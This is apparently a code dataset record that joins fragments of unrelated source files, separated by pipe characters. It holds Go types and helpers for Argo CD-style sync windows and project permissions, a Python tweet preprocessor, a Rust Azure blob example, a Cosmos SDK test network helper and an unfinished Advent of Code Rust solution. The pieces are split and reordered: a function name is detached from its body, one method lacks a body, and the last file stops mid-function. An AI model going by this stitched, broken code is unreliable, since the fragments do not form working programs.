if globMatch(c, app.Spec.Destination.Server) {
matchingWindows = append(matchingWindows, w)
break
}
}
}
if len(w.Namespaces) > 0 {
for _, n := range w.Namespaces {
if globMatch(n, app.Spec.Destination.Namespace) {
matchingWindows = append(matchingWindows, w)
break
}
}
}
}
if len(matchingWindows) > 0 {
return &matchingWindows
}
}
return nil
}
func (w *SyncWindows) CanSync(isManual bool) bool {
if !w.HasWindows() {
return true
}
var allowActive, denyActive, manualEnabled bool
active := w.Active()
denyActive, manualEnabled = active.hasDeny()
allowActive = active.hasAllow()
if !denyActive {
if !allowActive {
if isManual && w.InactiveAllows().manualEnabled() {
return true
}
} else {
return true
}
} else {
if isManual && manualEnabled {
return true
}
}
return false
}
func (w *SyncWindows) hasDeny() (bool, bool) {
if !w.HasWindows() {
return false, false
}
var denyActive, manualEnabled bool
for _, a := range *w {
if a.Kind == "deny" {
if !denyActive {
manualEnabled = a.ManualSync
} else {
if manualEnabled {
if !a.ManualSync {
manualEnabled = a.ManualSync
}
}
}
denyActive = true
}
}
return denyActive, manualEnabled
}
func (w *SyncWindows) hasAllow() bool {
if !w.HasWindows() {
return false
}
for _, a := range *w {
if a.Kind == "allow" {
return true
}
}
return false
}
func (w *SyncWindows) manualEnabled() bool {
if !w.HasWindows() {
return false
}
for _, s := range *w {
if s.ManualSync {
return true
}
}
return false
}
func (w SyncWindow) Active() bool {
return w.active(time.Now())
}
func (w SyncWindow) active(currentTime time.Time) bool {
// If SyncWindow.Active() is called outside of a UTC locale, it should be
// first converted to UTC before search
currentTime = currentTime.UTC()
specParser := cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
schedule, _ := specParser.Parse(w.Schedule)
duration, _ := time.ParseDuration(w.Duration)
nextWindow := schedule.Next(currentTime.Add(-duration))
return nextWindow.Before(currentTime)
}
func (w *SyncWindow) Update(s string, d string, a []string, n []string, c []string) error {
if len(s) == 0 && len(d) == 0 && len(a) == 0 && len(n) == 0 && len(c) == 0 {
return fmt.Errorf("cannot update: require one or more of schedule, duration, application, namespace, or cluster")
}
if len(s) > 0 {
w.Schedule = s
}
if len(d) > 0 {
w.Duration = d
}
if len(a) > 0 {
w.Applications = a
}
if len(n) > 0 {
w.Namespaces = n
}
if len(c) > 0 {
w.Clusters = c
}
return nil
}
func (w *SyncWindow) Validate() error {
if w.Kind != "allow" && w.Kind != "deny" {
return fmt.Errorf("kind '%s' mismatch: can only be allow or deny", w.Kind)
}
specParser := cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
_, err := specParser.Parse(w.Schedule)
if err != nil {
return fmt.Errorf("cannot parse schedule '%s': %s", w.Schedule, err)
}
_, err = time.ParseDuration(w.Duration)
if err != nil {
return fmt.Errorf("cannot parse duration '%s': %s", w.Duration, err)
}
return nil
}
func (d AppProjectSpec) DestinationClusters() []string {
servers := make([]string, 0)
for _, d := range d.Destinations {
servers = append(servers, d.Server)
}
return servers
}
// ProjectRole represents a role that has access to a project
type ProjectRole struct {
// Name is a name for this role
Name string `json:"name" protobuf:"bytes,1,opt,name=name"`
// Description is a description of the role
Description string `json:"description,omitempty" protobuf:"bytes,2,opt,name=description"`
// Policies Stores a list of casbin formated strings that define access policies for the role in the project
Policies []string `json:"policies,omitempty" protobuf:"bytes,3,rep,name=policies"`
// JWTTokens are a list of generated JWT tokens bound to this role
JWTTokens []JWTToken `json:"jwtTokens,omitempty" protobuf:"bytes,4,rep,name=jwtTokens"`
// Groups are a list of OIDC group claims bound to this role
Groups []string `json:"groups,omitempty" protobuf:"bytes,5,rep,name=groups"`
}
// JWTToken holds the issuedAt and expiresAt values of a token
type JWTToken struct {
IssuedAt int64 `json:"iat" protobuf:"int64,1,opt,name=iat"`
ExpiresAt int64 `json:"exp,omitempty" protobuf:"int64,2,opt,name=exp"`
ID string `json:"id,omitempty" protobuf:"bytes,3,opt,name=id"`
}
// Command holds binary path and arguments list
type Command struct {
Command []string `json:"command,omitempty" protobuf:"bytes,1,name=command"`
Args []string `json:"args,omitempty" protobuf:"bytes,2,rep,name=args"`
}
// ConfigManagementPlugin contains config management plugin configuration
type ConfigManagementPlugin struct {
Name string `json:"name" protobuf:"bytes,1,name=name"`
Init *Command `json:"init,omitempty" protobuf:"bytes,2,name=init"`
Generate Command `json:"generate" protobuf:"bytes,3,name=generate"`
}
// KustomizeOptions are options for kustomize to use when building manifests
type KustomizeOptions struct {
// BuildOptions is a string of build parameters to use when calling `kustomize build`
BuildOptions string `protobuf:"bytes,1,opt,name=buildOptions"`
// BinaryPath holds optional path to kustomize binary
BinaryPath string `protobuf:"bytes,2,opt,name=binaryPath"`
}
// ProjectPoliciesString returns Casbin formated string of a project's policies for each role
func (proj *AppProject) ProjectPoliciesString() string {
var policies []string
for _, role := range proj.Spec.Roles {
projectPolicy := fmt.Sprintf("p, proj:%s:%s, projects, get, %s, allow", proj.ObjectMeta.Name, role.Name, proj.ObjectMeta.Name)
policies = append(policies, projectPolicy)
policies = append(policies, role.Policies...)
for _, groupName := range role.Groups {
policies = append(policies, fmt.Sprintf("g, %s, proj:%s:%s", groupName, proj.ObjectMeta.Name, role.Name))
}
}
return strings.Join(policies, "\n")
}
// CascadedDeletion indicates if resources finalizer is set and controller should delete app resources before deleting app
func (app *Application) CascadedDeletion() bool {
return getFinalizerIndex(app.ObjectMeta, common.ResourcesFinalizerName) > -1
}
func (app *Application) IsRefreshRequested() (RefreshType, bool) {
refreshType := RefreshTypeNormal
annotations := app.GetAnnotations()
if annotations == nil {
return refreshType, false
}
typeStr, ok := annotations[common.AnnotationKeyRefresh]
if !ok {
return refreshType, false
}
if typeStr == string(RefreshTypeHard) {
refreshType = RefreshTypeHard
}
return refreshType, true
}
// SetCascadedDeletion sets or remove resources finalizer
func (app *Application) SetCascadedDeletion(prune bool) {
setFinalizer(&app.ObjectMeta, common.ResourcesFinalizerName, prune)
}
func (status *ApplicationStatus) Expired(statusRefreshTimeout time.Duration) bool {
return status.ReconciledAt == nil || status.ReconciledAt.Add(statusRefreshTimeout).Before(time.Now().UTC())
}
// SetConditions updates the application status conditions for a subset of evaluated types.
// If the application has a pre-existing condition of a type that is not in the evaluated list,
// it will be preserved. If the application has a pre-existing condition of a type that
// is in the evaluated list, but not in the incoming conditions list, it will be removed.
func (status *ApplicationStatus) SetConditions(conditions []ApplicationCondition, evaluatedTypes map[ApplicationConditionType]bool) {
appConditions := make([]ApplicationCondition, 0)
now := metav1.Now()
for i := 0; i < len(status.Conditions); i++ {
condition := status.Conditions[i]
if _, ok := evaluatedTypes[condition.Type]; !ok {
if condition.LastTransitionTime == nil {
condition.LastTransitionTime = &now
}
appConditions = append(appConditions, condition)
}
}
for i := range conditions {
condition := conditions[i]
if condition.LastTransitionTime == nil {
condition.LastTransitionTime = &now
}
eci := findConditionIndexByType(status.Conditions, condition.Type)
if eci >= 0 && status.Conditions[eci].Message == condition.Message {
// If we already have a condition of this type, only update the timestamp if something
// has changed.
appConditions = append(appConditions, status.Conditions[eci])
} else {
// Otherwise we use the new incoming condition with an updated timestamp:
appConditions = append(appConditions, condition)
}
}
sort.Slice(appConditions, func(i, j int) bool {
left := appConditions[i]
right := appConditions[j]
return fmt.Sprintf("%s/%s/%v", left.Type, left.Message, left.LastTransitionTime) < fmt.Sprintf("%s/%s/%v", right.Type, right.Message, right.LastTransitionTime)
})
status.Conditions = appConditions
}
func findConditionIndexByType(conditions []ApplicationCondition, t ApplicationConditionType) int {
for i := range conditions {
if conditions[i].Type == t {
return i
}
}
return -1
}
// GetErrorConditions returns list of application error conditions
func (status *ApplicationStatus) GetConditions(conditionTypes map[ApplicationConditionType]bool) []ApplicationCondition {
result := make([]ApplicationCondition, 0)
for i := range status.Conditions {
condition := status.Conditions[i]
if ok := conditionTypes[condition.Type]; ok {
result = append(result, condition)
}
}
return result
}
// IsError returns true if condition is error condition
func (condition *ApplicationCondition) IsError() bool {
return strings.HasSuffix(condition.Type, "Error")
}
// Equals compares two instances of ApplicationSource and return true if instances are equal.
func (source *ApplicationSource) Equals(other ApplicationSource) bool {
return reflect.DeepEqual(*source, other)
}
func (source *ApplicationSource) ExplicitType() (*ApplicationSourceType, error) {
var appTypes []ApplicationSourceType
if source.Kustomize != nil {
appTypes = append(appTypes, ApplicationSourceTypeKustomize)
}
if source.Helm != nil {
appTypes = append(appTypes, ApplicationSourceTypeHelm)
}
if source.Ksonnet != nil {
appTypes = append(appTypes, ApplicationSourceTypeKsonnet)
}
if source.Directory != nil {
appTypes = append(appTypes, ApplicationSourceTypeDirectory)
}
if source.Plugin != nil {
appTypes = append(appTypes, ApplicationSourceTypePlugin)
}
if len(appTypes) == 0 {
return nil, nil
}
if len(appTypes) > 1 {
typeNames := make([]string, len(appTypes))
for i := range appTypes {
typeNames[i] = string(appTypes[i])
}
return nil, fmt.Errorf("multiple application sources defined: %s", strings.Join(typeNames, ","))
}
appType := appTypes[0]
return &appType, nil
}
// Equals compares two instances of ApplicationDestination and return true if instances are equal.
func (dest ApplicationDestination) Equals(other ApplicationDestination) bool {
// ignore destination cluster name and isServerInferred fields during comparison
// since server URL is inferred from cluster name
if dest.isServerInferred {
dest.Server = ""
dest.isServerInferred = false
}
if other.isServerInferred {
other.Server = ""
other.isServerInferred = false
}
return reflect.DeepEqual(dest, other)
}
// GetProject returns the application's project. This is preferred over spec.Project which may be empty
func (spec ApplicationSpec) GetProject() string {
if spec.Project == "" {
return common.DefaultAppProjectName
}
return spec.Project
}
func (spec ApplicationSpec) GetRevisionHistoryLimit() int {
if spec.RevisionHistoryLimit != nil {
return int(*spec.RevisionHistoryLimit)
}
return common.RevisionHistoryLimit
}
func isResourceInList(res metav1.GroupKind, list []metav1.GroupKind) bool {
for _, item := range list {
ok, err := filepath.Match(item.Kind, res.Kind)
if ok && err == nil {
ok, err = filepath.Match(item.Group, res.Group)
if ok && err == nil {
return true
}
}
}
return false
}
// IsGroupKindPermitted validates if the given resource group/kind is permitted to be deployed in the project
func (proj AppProject) IsGroupKindPermitted(gk schema.GroupKind, namespaced bool) bool {
var isWhiteListed, isBlackListed bool
res := metav1.GroupKind{Group: gk.Group, Kind: gk.Kind}
if namespaced {
namespaceWhitelist := proj.Spec.NamespaceResourceWhitelist
namespaceBlacklist := proj.Spec.NamespaceResourceBlacklist
isWhiteListed = namespaceWhitelist == nil || len(namespaceWhitelist) != 0 && isResourceInList(res, namespaceWhitelist)
isBlackListed = len(namespaceBlacklist) != 0 && isResourceInList(res, namespaceBlacklist)
return isWhiteListed && !isBlackListed
}
clusterWhitelist := proj.Spec.ClusterResourceWhitelist
clusterBlacklist := proj.Spec.ClusterResourceBlacklist
isWhiteListed = len(clusterWhitelist) != 0 && isResourceInList(res, clusterWhitelist)
isBlackListed = len(clusterBlacklist) != 0 && isResourceInList(res, clusterBlacklist)
return isWhiteListed && !isBlackListed
}
func (proj AppProject) IsLiveResourcePermitted(un *unstructured.Unstructured, server string) bool {
if !proj.IsGroupKindPermitted(un.GroupVersionKind().GroupKind(), un.GetNamespace() != "") {
return false
}
if un.GetNamespace() != "" {
return proj.IsDestinationPermitted(ApplicationDestination{Server: server, Namespace: un.GetNamespace()})
}
return true
}
// getFinalizerIndex returns finalizer index in the list of object finalizers or -1 if finalizer does not exist
func getFinalizerIndex(meta metav1.ObjectMeta, name string) int {
for i, finalizer := range meta.Finalizers {
if finalizer == name {
return i
}
}
return -1
}
// setFinalizer adds or removes finalizer with the specified name
func setFinalizer(meta *metav1.ObjectMeta, name string, exist bool) {
index := getFinalizerIndex(*meta, name)
if exist != (index > -1) {
if index > -1 {
meta.Finalizers[index] = meta.Finalizers[len(meta.Finalizers)-1]
meta.Finalizers = meta.Finalizers[:len(meta.Finalizers)-1]
} else {
meta.Finalizers = append(meta.Finalizers, name)
}
}
}
func (proj AppProject) HasFinalizer() bool {
return getFinalizerIndex(proj.ObjectMeta, common.ResourcesFinalizerName) > -1
}
func (proj *AppProject) RemoveFinalizer() {
setFinalizer(&proj.ObjectMeta, common.ResourcesFinalizerName, false)
}
func globMatch(pattern string, val string, separators ...rune) bool {
if pattern == "*" {
return true
}
return glob.Match(pattern, val, separators...)
}
// IsSourcePermitted validates if the provided application's source is a one of the allowed sources for the project.
func (proj AppProject) IsSourcePermitted(src ApplicationSource) bool {
srcNormalized := git.NormalizeGitURL(src.RepoURL)
for _, repoURL := range proj.Spec.SourceRepos {
normalized := git.NormalizeGitURL(repoURL)
if globMatch(normalized, srcNormalized, '/') {
return true
}
}
return false
}
// IsDestinationPermitted validates if the provided application's destination is one of the allowed destinations for the project
func (proj AppProject) IsDestinationPermitted(dst ApplicationDestination) bool {
for _, item := range proj.Spec.Destinations {
if globMatch(item.Server, dst.Server) && globMatch(item.Namespace, dst.Namespace) {
return true
}
}
return false
}
// SetK8SConfigDefaults sets Kubernetes REST config default settings
func SetK8SConfigDefaults(config *rest.Config) error {
config.QPS = common.K8sClientConfigQPS
config.Burst = common.K8sClientConfigBurst
tlsConfig, err := rest.TLSConfigFor(config)
if err != nil {
return err
}
dial := (&net.Dialer{
Timeout: 30 * time.Second,
KeepAlive: 30 * time.Second,
}).DialContext
transport := utilnet.SetTransportDefaults(&http.Transport{
Proxy: http.ProxyFromEnvironment,
TLSHandshakeTimeout: 10 * time.Second,
TLSClientConfig: tlsConfig,
MaxIdleConns: common.K8sMaxIdleConnections,
MaxIdleConnsPerHost: common.K8sMaxIdleConnections,
MaxConnsPerHost: common.K8sMaxIdleConnections,
DialContext: dial,
DisableCompression: config.DisableCompression,
})
tr, err := rest.HTTPWrappersForConfig(config, transport)
if err != nil {
return err
}
// set default tls config and remove auth/exec provides since we use it in a custom transport
config.TLSClientConfig = rest.TLSClientConfig{}
config.AuthProvider = nil
config.ExecProvider = nil
config.Transport = tr
return nil
}
// RawRestConfig returns a go-client REST config from cluster that might be serialized into the file using kube.WriteKubeConfig method.
func (c *Cluster) RawRestConfig() *rest.Config {
var config *rest.Config
var err error
if c.Server == common.KubernetesInternalAPIServerAddr && os.Getenv(common.EnvVarFakeInClusterConfig) == "true" {
conf, exists := os.LookupEnv("KUBECONFIG")
if exists {
config, err = clientcmd.BuildConfigFromFlags("", conf)
} else {
config, err = clientcmd.BuildConfigFromFlags("", filepath.Join(os.Getenv("HOME"), ".kube", "config"))
}
} else if c.Server == common.KubernetesInternalAPIServerAddr && c.Config.Username == "" && c.Config.Password == "" && c.Config.BearerToken == "" {
config, err = rest.InClusterConfig()
} else {
tlsClientConfig := rest.TLSClientConfig{
Insecure: c.Config.TLSClientConfig.Insecure,
ServerName: c.Config.TLSClientConfig.ServerName,
CertData: c.Config.TLSClientConfig.CertData,
KeyData: c.Config.TLSClientConfig.KeyData,
CAData: c.Config.TLSClientConfig.CAData,
}
if c.Config.AWSAuthConfig != nil {
args := []string{"eks", "get-token", "--cluster-name", c.Config.AWSAuthConfig.ClusterName}
if c.Config.AWSAuthConfig.RoleARN != "" {
args = append(args, "--role-arn", c.Config.AWSAuthConfig.RoleARN)
}
config = &rest.Config{
Host: c.Server,
TLSClientConfig: tlsClientConfig,
ExecProvider: &api.ExecConfig{
APIVersion: "client.authentication.k8s.io/v1alpha1",
Command: "aws",
Args: args,
},
}
} else if c.Config.ExecProviderConfig != nil {
var env []api.ExecEnvVar
if c.Config.ExecProviderConfig.Env != nil {
for key, value := range c.Config.ExecProviderConfig.Env {
env = append(env, api.ExecEnvVar{
Name: key,
Value: value,
})
}
}
config = &rest.Config{
Host: c.Server,
TLSClientConfig: tlsClientConfig,
ExecProvider: &api.ExecConfig{
APIVersion: c.Config.ExecProviderConfig.APIVersion,
Command: c.Config.ExecProviderConfig.Command,
Args: c.Config.ExecProviderConfig.Args,
Env: env,
InstallHint: c.Config.ExecProviderConfig.InstallHint,
},
}
} else {
config = &rest.Config{
Host: c.Server,
Username: c.Config.Username,
Password: c.Config.Password,
BearerToken: c.Config.BearerToken,
TLSClientConfig: tlsClientConfig,
}
}
}
if err != nil {
panic(fmt.Sprintf("Unable to create K8s REST config: %v", err))
}
return config
}
// RESTConfig returns a go-client REST config from cluster with tuned throttling and HTTP client settings.
func (c *Cluster) RESTConfig() *rest.Config {
config := c.RawRestConfig()
err := SetK8SConfigDefaults(config)
if err != nil {
panic(fmt.Sprintf("Unable to apply K8s REST config defaults: %v", err))
}
return config
}
func UnmarshalToUnstructured(resource string) (*unstructured.Unstructured, error) {
if resource == "" || resource == "null" {
return nil, nil
}
var obj unstructured.Unstructured
err := json.Unmarshal([]byte(resource), &obj)
if err != nil {
return nil, err
}
return &obj, nil
}
func (r ResourceDiff) LiveObject() (*unstructured.Unstructured, error) {
return UnmarshalToUnstructured(r.LiveState)
}
func (r ResourceDiff) TargetObject() (*unstructured.Unstructured, error) {
return UnmarshalToUnstructured(r.TargetState)
}
func (d *ApplicationDestination) SetInferredServer(server string) {
d.isServerInferred = true
d.Server = server
}
func (d *ApplicationDestination) IsServerInferred() bool {
return d.isServerInferred
}
func (d *ApplicationDestination) MarshalJSON() ([]byte, error) {
type Alias ApplicationDestination
dest := d
if d.isServerInferred {
dest = dest.DeepCopy()
dest.Server = ""
}
return json.Marshal(&struct{ *Alias }{Alias: (*Alias)(dest)})
}
func (proj *AppProject) NormalizeJWTTokens() bool {
needNormalize := false
for i, role := range proj.Spec.Roles {
for j, token := range role.JWTTokens {
if token.ID == "" {
token.ID = strconv.FormatInt(token.IssuedAt, 10)
role.JWTTokens[j] = token
needNormalize = true
}
}
proj.Spec.Roles[i] = role
}
for _, roleTokenEntry := range proj.Status.JWTTokensByRole {
for j, token := range roleTokenEntry.Items {
if token.ID == "" {
token.ID = strconv.FormatInt(token.IssuedAt, 10)
roleTokenEntry.Items[j] = token
needNormalize = true
}
}
}
needSync := syncJWTTokenBetweenStatusAndSpec(proj)
return needNormalize || needSync
}
func syncJWTTokenBetweenStatusAndSpec(proj *AppProject) bool {
existingRole := map[string]bool{}
needSync := false
for roleIndex, role := range proj.Spec.Roles {
existingRole[role.Name] = true
tokensInSpec := role.JWTTokens
tokensInStatus := []JWTToken{}
if proj.Status.JWTTokensByRole == nil {
tokensByRole := make(map[string]JWTTokens)
proj.Status.JWTTokensByRole = tokensByRole
} else {
tokensInStatus = proj.Status.JWTTokensByRole[role.Name].Items
}
tokens := jwtTokensCombine(tokensInStatus, tokensInSpec)
sort.Slice(proj.Spec.Roles[roleIndex].JWTTokens, func(i, j int) bool {
return proj.Spec.Roles[roleIndex].JWTTokens[i].IssuedAt > proj.Spec.Roles[roleIndex].JWTTokens[j].IssuedAt
})
sort.Slice(proj.Status.JWTTokensByRole[role.Name].Items, func(i, j int) bool {
return proj.Status.JWTTokensByRole[role.Name].Items[i].IssuedAt > proj.Status.JWTTokensByRole[role.Name].Items[j].IssuedAt
})
if !cmp.Equal(tokens, proj.Spec.Roles[roleIndex].JWTTokens) || !cmp.Equal(tokens, proj.Status.JWTTokensByRole[role.Name].Items) {
needSync = true
}
proj.Spec.Roles[roleIndex].JWTTokens = tokens
proj.Status.JWTTokensByRole[role.Name] = JWTTokens{Items: tokens}
}
if proj.Status.JWTTokensByRole != nil {
for role := range proj.Status.JWTTokensByRole {
if !existingRole[role] {
delete(proj.Status.JWTTokensByRole, role)
needSync = true
}
}
}
return needSync
}
func jwtTokensCombine(tokens1 []JWTToken, tokens2 []JWTToken) []JWTToken {
tokensMap := make(map[string]JWTToken)
for _, token := range append(tokens1, tokens2...) {
tokensMap[token.ID] = token
}
var tokens []JWTToken
for _, v := range tokensMap {
tokens = append(tokens, v)
}
sort.Slice(tokens, func(i, j int) bool {
return tokens[i].IssuedAt > tokens[j].IssuedAt
})
return tokens
}
| {
if strings.TrimSpace(name) == "" {
return status.Errorf(codes.InvalidArgument, "group '%s' is empty", name)
}
if invalidChars.MatchString(name) {
return status.Errorf(codes.InvalidArgument, "group '%s' contains invalid characters", name)
}
return nil
} |
PreProcess.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
####
#### Author: Pedro Paulo Balage Filho
#### Version: 1.0
#### Date: 12/03/13
####
from string import punctuation, letters
import re
# Requires Pattern library (http://www.clips.ua.ac.be/pages/pattern)
from pattern.en import tag
from pattern.vector import stem, PORTER
### Provides a pre-process for tweet messages.
### Replace emoticons, hash, mentions and urls for codes
### Correct long seguences of letters and punctuations
### Apply the Pattern part-of_speech tagger to the message
### Requires the Pattern library to work (http://www.clips.ua.ac.be/pages/pattern)
def pre_process(tweet_message):
# Pattern tag -> a fast tagger
# assures the message can be converted to unicode. Reject the encoding
# errors
| tweet_message = tweet_message.decode('utf8',errors='ignore')
# substitute hashes
tweet_message = re.sub(re.escape('#')+r'(\w+)','&hash \g<1>',tweet_message)
# substitute users mentions
tweet_message = re.sub(re.escape('@')+r'(\w+)','&mention \g<1>',tweet_message)
# substitute urls
tweet_message = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+','&url',tweet_message)
# look for emoticons.
# Some elements from http://en.wikipedia.org/wiki/List_of_emoticons
emoticons = { ':-)' : '&happy',
':)' : '&happy',
':o)' : '&happy',
':]' : '&happy',
':3' : '&happy',
':c)' : '&happy',
':>' : '&happy',
'=]' : '&happy',
'8)' : '&happy',
'=)' : '&happy',
':}' : '&happy',
':^)' : '&happy',
':-))' : '&happy',
'|;-)' : '&happy',
":'-)" : '&happy',
":')" : '&happy',
'\o/' : '&happy',
'*\\0/*': '&happy',
':-D' : '&laugh',
':D' : '&laugh',
'8-D' : '&laugh',
'8D' : '&laugh',
'x-D' : '&laugh',
'xD' : '&laugh',
'X-D' : '&laugh',
'XD' : '&laugh',
'=-D' : '&laugh',
'=D' : '&laugh',
'=-3' : '&laugh',
'=3' : '&laugh',
'B^D' : '&laugh',
'>:[' : '&sad',
':-(' : '&sad',
':(' : '&sad',
':-c' : '&sad',
':c' : '&sad',
':-<' : '&sad',
':<' : '&sad',
':-[' : '&sad',
':[' : '&sad',
':{' : '&sad',
':-||' : '&sad',
':@' : '&sad',
":'-(" : '&sad',
":'(" : '&sad',
'D:<' : '&sad',
'D:' : '&sad',
'D8' : '&sad',
'D;' : '&sad',
'D=' : '&sad',
'DX' : '&sad',
'v.v' : '&sad',
"D-':" : '&sad',
'(>_<)' : '&sad',
':|' : '&sad',
'>:O' : '&surprise',
':-O' : '&surprise',
':-o' : '&surprise',
':O' : '&surprise',
'°o°' : '&surprise',
':O' : '&surprise',
'o_O' : '&surprise',
'o_0' : '&surprise',
'o.O' : '&surprise',
'8-0' : '&surprise',
'|-O' : '&surprise',
';-)' : '&wink',
';)' : '&wink',
'*-)' : '&wink',
'*)' : '&wink',
';-]' : '&wink',
';]' : '&wink',
';D' : '&wink',
';^)' : '&wink',
':-,' : '&wink',
'>:P' : '&tong',
':-P' : '&tong',
':P' : '&tong',
'X-P' : '&tong',
'x-p' : '&tong',
'xp' : '&tong',
'XP' : '&tong',
':-p' : '&tong',
':p' : '&tong',
'=p' : '&tong',
':-Þ' : '&tong',
':Þ' : '&tong',
':-b' : '&tong',
':b' : '&tong',
':-&' : '&tong',
':&' : '&tong',
'>:\\' : '&annoyed',
'>:/' : '&annoyed',
':-/' : '&annoyed',
':-.' : '&annoyed',
':/' : '&annoyed',
':\\' : '&annoyed',
'=/' : '&annoyed',
'=\\' : '&annoyed',
':L' : '&annoyed',
'=L' : '&annoyed',
':S' : '&annoyed',
'>.<' : '&annoyed',
':-|' : '&annoyed',
'<:-|' : '&annoyed',
':-X' : '&seallips',
':X' : '&seallips',
':-#' : '&seallips',
':#' : '&seallips',
'O:-)' : '&angel',
'0:-3' : '&angel',
'0:3' : '&angel',
'0:-)' : '&angel',
'0:)' : '&angel',
'0;^)' : '&angel',
'>:)' : '&devil',
'>;)' : '&devil',
'>:-)' : '&devil',
'}:-)' : '&devil',
'}:)' : '&devil',
'3:-)' : '&devil',
'3:)' : '&devil',
'o/\o' : '&highfive',
'^5' : '&highfive',
'>_>^' : '&highfive',
'^<_<' : '&highfive',
'<3' : '&heart'
}
# substitute emoticons using regular expression
for symbol in emoticons:
tweet_message = re.sub(r'('+re.escape(symbol)+r')[^a-z0-9A-Z]',' \g<1> '+emoticons[symbol]+' ',tweet_message+' ')
# normalize punctuation signals, like ..., !!!!!!!!, ???????, etc
tweet_message = re.sub(re.escape('...'),'.' + ' &dots',tweet_message)
for symbol in punctuation:
tweet_message = re.sub(re.escape(symbol)+r'{3,}',' ' + symbol + ' &emphasis',tweet_message)
# normalize long sequence of letters coooool -> col, looooove -> love,
# gooooodd -> god
# (always keep one letter)
for symbol in letters:
tweet_message = re.sub(re.escape(symbol)+r'{3,}', symbol ,tweet_message)
# remove many blank spaces.
tweet_message = re.sub(' +',' ' ,tweet_message)
tweet_message = tweet_message.strip()
# Include POS information
tweet_message = tag(tweet_message, tokenize=False)
# Stemmer?
#tweet_message = [(stem(w, stemmer=PORTER),t) for w,t in tweet_message]
# return the twitte in the format [(word,tag),...]
return tweet_message
|
|
blob_01.rs | use azure_storage::core::prelude::*;
use azure_storage_blobs::prelude::*;
#[tokio::main]
async fn | () -> azure_core::Result<()> {
env_logger::init();
// First we retrieve the account name and master key from environment variables.
let account =
std::env::var("STORAGE_ACCOUNT").expect("Set env variable STORAGE_ACCOUNT first!");
let master_key =
std::env::var("STORAGE_MASTER_KEY").expect("Set env variable STORAGE_MASTER_KEY first!");
let container_name = std::env::args()
.nth(1)
.expect("please specify container name as command line parameter");
let http_client = azure_core::new_http_client();
let storage_client =
StorageAccountClient::new_access_key(http_client.clone(), &account, &master_key)
.as_storage_client();
let container_client = storage_client.as_container_client(&container_name);
let blob_client = container_client.as_blob_client("SorgeniaReorganizeRebuildIndexes.zip");
let _res = container_client
.list_blobs()
.include_copy(true)
.include_deleted(true)
.include_metadata(true)
.include_snapshots(true)
.include_uncommitted_blobs(true)
.execute()
.await?;
let result = blob_client.get().execute().await?;
println!("{:?}", result);
Ok(())
}
| main |
network.go | package network
import (
"fmt"
"testing"
"time"
"github.com/cosmos/cosmos-sdk/baseapp"
"github.com/cosmos/cosmos-sdk/crypto/hd"
"github.com/cosmos/cosmos-sdk/crypto/keyring"
servertypes "github.com/cosmos/cosmos-sdk/server/types"
"github.com/cosmos/cosmos-sdk/simapp"
storetypes "github.com/cosmos/cosmos-sdk/store/types"
"github.com/cosmos/cosmos-sdk/testutil/network"
sdk "github.com/cosmos/cosmos-sdk/types"
authtypes "github.com/cosmos/cosmos-sdk/x/auth/types"
tmrand "github.com/tendermint/tendermint/libs/rand"
tmdb "github.com/tendermint/tm-db"
"github.com/crypto-org-chain/cronos/app"
)
type (
Network = network.Network
Config = network.Config
)
// New creates instance with fully configured cosmos network.
// Accepts optional config, that will be used in place of the DefaultConfig() if provided.
func New(t *testing.T, configs ...network.Config) *network.Network {
if len(configs) > 1 {
panic("at most one config should be provided")
}
var cfg network.Config
if len(configs) == 0 {
cfg = DefaultConfig()
} else {
cfg = configs[0]
}
net := network.New(t, cfg)
t.Cleanup(net.Cleanup)
return net
}
// DefaultConfig will initialize config for the network with custom application,
// genesis and single validator. All other parameters are inherited from cosmos-sdk/testutil/network.DefaultConfig
func DefaultConfig() network.Config {
encoding := app.MakeEncodingConfig()
return network.Config{
Codec: encoding.Marshaler,
TxConfig: encoding.TxConfig,
LegacyAmino: encoding.Amino,
InterfaceRegistry: encoding.InterfaceRegistry,
AccountRetriever: authtypes.AccountRetriever{},
AppConstructor: func(val network.Validator) servertypes.Application {
return app.New(
val.Ctx.Logger, tmdb.NewMemDB(), nil, true, map[int64]bool{}, val.Ctx.Config.RootDir, 0,
encoding,
// this line is used by starport scaffolding # stargate/testutil/appArgument | baseapp.SetPruning(storetypes.NewPruningOptionsFromString(val.AppConfig.Pruning)),
baseapp.SetMinGasPrices(val.AppConfig.MinGasPrices),
)
},
GenesisState: app.ModuleBasics.DefaultGenesis(encoding.Marshaler),
TimeoutCommit: 2 * time.Second,
ChainID: "chain-" + tmrand.NewRand().Str(6),
NumValidators: 1,
BondDenom: sdk.DefaultBondDenom,
MinGasPrices: fmt.Sprintf("0.000006%s", sdk.DefaultBondDenom),
AccountTokens: sdk.TokensFromConsensusPower(1000, sdk.DefaultPowerReduction),
StakingTokens: sdk.TokensFromConsensusPower(500, sdk.DefaultPowerReduction),
BondedTokens: sdk.TokensFromConsensusPower(100, sdk.DefaultPowerReduction),
PruningStrategy: storetypes.PruningOptionNothing,
CleanupDir: true,
SigningAlgo: string(hd.Secp256k1Type),
KeyringOptions: []keyring.Option{},
}
} | simapp.EmptyAppOptions{}, |
9-2.rs | mod xmas {
use std::collections::VecDeque;
pub struct Xmas {
preamble_size: usize,
numbers: VecDeque<usize>,
}
impl Xmas {
pub fn new(preamble_size: usize) -> Xmas {
Xmas {
preamble_size,
numbers: VecDeque::new(),
}
}
pub fn push(&mut self, number: usize) |
pub fn is_valid(&self, number: usize) -> bool {
let length = self.numbers.len();
for i in 0..length {
for j in i..length {
if self.numbers[i] + self.numbers[j] == number {
return true;
}
}
}
false
}
}
}
use crate::xmas::*;
use std::io::{self, Read};
fn find_contiguous_summands(numbers: Vec<usize>, search_sum: usize) -> Option<Vec<usize>> {
let length = numbers.len();
for i in 0..length {
for j in i..length {
let iter = numbers.iter().skip(i).take(j - i);
let iter_sum: usize = iter.clone().sum();
if iter_sum == search_sum {
return Some(iter.copied().collect());
} else if iter_sum > search_sum {
break;
}
}
}
None
}
fn main() -> Result<(), Box<dyn std::error::Error>> {
let input = {
let mut buffer = String::new();
let mut stdin = io::stdin();
stdin.read_to_string(&mut buffer)?;
buffer
};
let numbers: Vec<usize> = input.lines().map(|line| line.parse().unwrap()).collect();
let invalid_number = {
let preamble_size = 25;
